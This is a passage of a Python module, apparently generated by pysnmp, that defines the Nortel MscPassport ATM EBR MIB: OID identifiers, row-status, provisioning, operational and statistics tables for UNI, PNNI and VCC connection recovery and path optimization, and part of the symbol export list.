    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfVptVccSrcEbrOv subtree (OID 1.3.6.1.4.1.562.36.2.1.114.9.20.8.2):
# per-VCC-source EBR override. Rows are indexed by the five-level
# AtmIf / Vpt / VptVcc / VptVccSrc / VptVccSrcEbrOv chain.
# ---------------------------------------------------------------------------
mscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 20, 8, 2))

# Row-status table (1).
mscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 20, 8, 2, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 20, 8, 2, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',
    'mscAtmIfVptVccSrcIndex'), (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB',
    'mscAtmIfVptVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')

# Provisioning table (20): yes/no enumerations (no=0, yes=1), default 'yes'.
mscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 20, 8, 2, 20))
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 20, 8, 2, 20, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',
    'mscAtmIfVptVccSrcIndex'), (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB',
    'mscAtmIfVptVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), Integer32().subtype(
    subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
    namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(
    'readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1,
    4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(
    subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
    namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(
    'readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfVptVccEbrInfo subtree (OID 1.3.6.1.4.1.562.36.2.1.114.9.20.12):
# per-VCC EBR status. Entirely read-only (even RowStatus here is
# 'readonly', unlike the provisionable subtrees above).
# ---------------------------------------------------------------------------
mscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    9, 20, 12))

# Row-status table (1).
mscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 20, 12, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 20, 12, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')

# Operational table (30): yes/no flags (no=0, yes=1), read-only.
mscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 20, 12, 30))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 20, 12, 30, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(
    subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
    namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(
    subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
    namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(
    subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
    namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')

# Statistics table (40): Counter32 running totals.
mscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 9, 20, 12, 40))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 9, 20, 12, 40, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1,
    4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfPnniEbr subtree (OID 1.3.6.1.4.1.562.36.2.1.114.96.7):
# EBR objects for PNNI directly on the ATM interface (no VPT level;
# three-part index chain). Layout mirrors the VPT subtrees above.
# ---------------------------------------------------------------------------
mscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))

# Row-status table (1).
mscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 96, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 96, 7, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrComponentName.setStatus('mandatory')
mscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrStorageType.setStatus('mandatory')
mscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    96, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrIndex.setStatus('mandatory')

# Provisioning table (20): 1-octet fixed-length bitmaps, default 0xc0.
mscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    96, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrProvTable.setStatus('mandatory')
mscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 96, 7, 20, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')

# Operational table (30): read-only connection gauges.
mscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    96, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrOperTable.setStatus('mandatory')
mscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 96, 7, 30, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 96, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
    ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=
    ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
    4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(
    subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')

# Statistics table (40): Counter32 running totals.
mscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    96, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 96, 7, 40, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 96, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 96, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# Conformance anchors under 1.3.6.1.4.1.562.36.2.2.159: object-group (…159.1)
# and capabilities (…159.3) identifier nodes. The CA02/CA02A leaves look like
# versioned conformance statements — confirm against the original MIB text.
# ---------------------------------------------------------------------------
atmEbrGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1))
atmEbrGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1))
atmEbrGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3)
    )
atmEbrGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1,
    1, 3, 2))
atmEbrCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3))
atmEbrCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159,
    3, 1))
atmEbrCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2,
    159, 3, 1, 3))
atmEbrCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2,
    159, 3, 1, 3, 2))
mibBuilder.exportSymbols('Nortel-MsCarrier-MscPassport-AtmEbrMIB',
mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA,
mscAtmIfUniEbrTotalConnectionRecoveries=
mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=
mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=
mscAtmIfVptPnniEbrProvEntry,
mscAtmIfVptVccEbrInfoTotalPathOptimizations=
mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=
mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=
mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup,
mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery,
mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry,
mscAtmIfVptUniEbrTotalPathOptimizations=
mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=
mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr,
mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization,
mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry,
mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType,
mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus,
mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable,
mscAtmIfVptPnniEbrSubscribedConnections=
mscAtmIfVptPnniEbrSubscribedConnections,
mscAtmIfVccEbrInfoTotalPathOptimizations=
mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=
mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=
mscAtmIfVptUniEbrProvEntry,
mscAtmIfVptPnniEbrEligibleRecoveredConnections=
mscAtmIfVptPnniEbrEligibleRecoveredConnections,
mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName,
mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry,
mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex,
mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType,
mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable,
mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization,
mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry,
mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry,
mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType,
mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry,
mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex,
mscAtmIfPnniEbrTotalConnectionRecoveries=
mscAtmIfPnniEbrTotalConnectionRecoveries,
mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable,
mscAtmIfPnniEbrEligibleRecoveredConnections=
mscAtmIfPnniEbrEligibleRecoveredConnections,
mscAtmIfVpcEbrInfoRecoverySubscribed=
mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=
mscAtmIfVptVccSrcEbrOvProvTable,
mscAtmIfVptVccEbrInfoConnectionRecovered=
mscAtmIfVptVccEbrInfoConnectionRecovered,
mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName,
mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName,
mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry,
mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName,
mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry,
mscAtmIfVptIispEbrTotalPathOptimizations=
mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=
mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex,
mscAtmIfVptUniEbrIneligibleRecoveredConnections=
mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02
=atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=
mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=
mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=
mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=
mscAtmIfVpcSrcEbrOvOptimizationSubscribed,
mscAtmIfIispEbrTotalPathOptimizations=
mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName
=mscAtmIfVccSrcEbrOvComponentName,
mscAtmIfVccSrcEbrOvOptimizationSubscribed=
mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=
mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=
mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=
mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=
mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=
mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=
mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=
mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=
mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=
mscAtmIfIispEbrRowStatusEntry,
mscAtmIfVptIispEbrIneligibleRecoveredConnections=
mscAtmIfVptIispEbrIneligibleRecoveredConnections,
atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A,
mscAtmIfVptVccEbrInfoOptimizationSubscribed=
mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=
mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=
mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=
mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=
mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=
mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=
mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=
mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=
mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=
mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=
mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=
mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=
mscAtmIfPnniEbrIneligibleRecoveredConnections,
mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable,
mscAtmIfVptPnniEbrIneligibleRecoveredConnections=
mscAtmIfVptPnniEbrIneligibleRecoveredConnections,
mscAtmIfVpcEbrInfoConnectionRecovered=
mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=
mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=
mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=
mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations
=mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=
mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=
mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=
mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=
mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=
mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex,
mscAtmIfVptUniEbrTotalConnectionRecoveries=
mscAtmIfVptUniEbrTotalConnectionRecoveries,
mscAtmIfVpcEbrInfoTotalConnectionRecoveries=
mscAtmIfVpcEbrInfoTotalConnectionRecoveries,
mscAtmIfVptVccSrcEbrOvRowStatusEntry=
mscAtmIfVptVccSrcEbrOvRowStatusEntry,
mscAtmIfIispEbrTotalConnectionRecoveries=
